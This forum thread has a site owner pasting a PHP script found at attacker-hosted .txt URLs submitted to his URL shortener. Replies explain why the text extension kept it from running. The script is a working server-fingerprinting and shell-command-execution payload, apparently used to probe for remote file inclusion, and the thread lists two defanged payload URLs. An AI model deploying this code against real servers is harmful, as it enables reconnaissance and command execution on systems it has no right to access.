Results 1 to 4 of 4

Thread: What is this?!

  1. #1
    Kovich's Avatar
    Kovich is offline Community Guardian
    Join Date
    Jan 2009
    Location
    Philadelphia, Pennsylvania
    Posts
    1,797
    Blog Entries
    30
    Thanks
    453
    Thanked 420 Times in 279 Posts

    What is this?!

    Someone put the following URL into my URL Shortener:
    I do not recommend clicking this link:
    http:// ta-photo .com /templates/Varages/mild.txt???

    Anyway, I visited it and it showed me this:

    PHP Code:
    <?php
    //CADOTUNJI Response
    $pwd1 =    @getcwd();
    $un = @php_uname();
    $os = @PHP_OS;
    $id1 ex("id");if (empty($id1)) {$id1 = @get_current_user();}
    $sof1 =    @getenv("SERVER_SOFTWARE");

    $php1 =    @phpversion();
    $name1 $_SERVER['SERVER_NAME'];
    $ip1 = @gethostbyname($SERVER_ADDR);
    $free1=    @diskfreespace($pwd1);
    $all1disk_total_space($pwd1);
    $used =    ConvertBytes($all1-$free1);
    $free =    ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free 0;}

    $all ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all 0;}
    if (@
    is_writable($pwd1)) {$perm "[W]";} else {$perm "[R]";}
    if (@
    ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf "ON";} else {$sf "OFF";}


    echo 
    "CADOTUNJI".$sf."<br>";
    echo 
    "uname -a:    $un<br>";
    echo 
    "os: $os<br>";
    echo 
    "id: $id1<br>";
    echo 
    "pwd: $pwd1<br>";

    echo 
    "php: $php1<br>";
    echo 
    "software:    $sof1<br>";
    echo 
    "srvip: $ip1<br>";
    echo 
    "srvname: $name1<br>";
    echo 
    "free: $free<br>";

    echo 
    "used: $used<br>";
    echo 
    "total: $all $perm<br>";

    function 
    ConvertBytes($number) {
     
    $len strlen($number);
     if(
    $len 4) { return sprintf("%d b"$number); }

    if(
    $len >= && $len <=6) { return sprintf("%0.2f Kb"$number/1024); }
     if(
    $len >= && $len <=9) { return sprintf("%0.2f Mb"$number/1024/1024); }
     return 
    sprintf("%0.2f Gb"$number/1024/1024/1024);

    }

    function 
    ex($cfe) {
     
    $res '';
     if (!empty(
    $cfe)) {
     if(
    function_exists('exec')) {
     @
    exec($cfe,$res);
     
    $res join("\n",$res);
     } elseif(
    function_exists('shell_exec')) {

    $res = @shell_exec($cfe);
     } elseif(
    function_exists('system')) {
     @
    ob_start();
     @
    system($cfe);
     
    $res = @ob_get_contents();
     @
    ob_end_clean();
     } elseif(
    function_exists('passthru')) {

    @
    ob_start();
     @
    passthru($cfe);
     
    $res = @ob_get_contents();
     @
    ob_end_clean();
     } elseif(@
    is_resource($f = @popen($cfe,"r"))) {
     
    $res "";
     while(!@
    feof($f)) { $res .= @fread($f,1024); }

    @
    pclose($f);
     } else { 
    $res "NULL"; }
     }
     return 
    $res;
    }


    ?>
    Is this some sort of exploit? Are they seeking vulnerabilities in my server? To be honest, I'm quite concerned.

    I removed it from the database. And I also found this, and removed it as well:
    http:// www. koreadefence .net/data/shirohige/zfxid.txt??

  2. #2
    fling33 is offline Unknown Net Builder
    Join Date
    Sep 2009
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    It looks like some sort of php exploit but don't worry about it because if you saw that code that means it didn't work. It's not supposed to show you the source code. If you do a search for "CADOTUNJI"you will see a couple hacked websites in the search results.

  3. #3
    TopDogger's Avatar
    TopDogger is offline Über Hund
    Join Date
    Jan 2009
    Location
    Hellfire, AZ
    Posts
    2,946
    Thanks
    341
    Thanked 883 Times in 671 Posts
    It displays the source code because the file name is mild.txt. With the TXT extension, it never gets run through the PHP parser.

    Perhaps the intention is to provide the source code to someone.
    "Democracy is two wolves and a lamb voting on what to have for lunch. Liberty is a well-armed lamb contesting the vote." -- Benjamin Franklin


  4. #4
    fling33 is offline Unknown Net Builder
    Join Date
    Sep 2009
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Good point. It is a text file so it is harmless in that it didn't run. But it may be harmful in that if he was using a URL shortener he is probably showing this code to others, and if it's malicious code that could be bad.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •